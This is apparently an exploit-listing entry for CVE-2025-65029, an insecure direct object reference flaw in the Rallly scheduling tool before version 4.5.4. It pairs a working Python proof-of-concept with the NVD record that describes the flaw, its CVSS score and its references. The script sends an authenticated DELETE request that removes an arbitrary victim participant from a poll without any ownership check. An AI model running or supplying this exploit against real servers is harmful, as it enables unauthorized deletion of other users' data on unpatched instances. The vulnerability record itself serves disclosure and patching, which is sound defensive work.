CVE-2025-65029

import requests import json # CVE-2025-65029 PoC - Rallly IDOR Vulnerability # Target: Rallly < 4.5.4 TARGET_URL = "http://target-server.com" ATTACKER_TOKEN = "attacker_auth_token_here" VICTIM_PARTICIPANT_ID = "victim_participant_uuid" POLL_ID = "target_poll_id" def delete_participant_idor(): """ IDOR exploit: Delete arbitrary participant without ownership verification The vulnerable endpoint only checks authentication, not authorization """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Vulnerable endpoint - no ownership check url = f"{TARGET_URL}/api/polls/{POLL_ID}/participants/{VICTIM_PARTICIPANT_ID}" response = requests.delete(url, headers=headers) if response.status_code == 200: print("[+] Successfully deleted victim participant!") print(f"[+] Deleted participant ID: {VICTIM_PARTICIPANT_ID}") elif response.status_code == 401: print("[-] Authentication failed") elif response.status_code == 404: print("[-] Participant not found") else: print(f"[-] Request failed with status: {response.status_code}") if __name__ == "__main__": print("CVE-2025-65029 IDOR PoC") print("Target: Rallly < 4.5.4") delete_participant_idor()

{"cve": {"id": "CVE-2025-65029", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:50.387", "lastModified": "2025-11-25T15:33:17.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an insecure direct object reference (IDOR) vulnerability allows any authenticated user to delete arbitrary participants from polls without ownership verification. The endpoint relies solely on a participant ID to authorize deletions, enabling attackers to remove other users (including poll owners) from polls. This impacts the integrity and availability of poll participation data. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-f8jc-6746-ww95", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}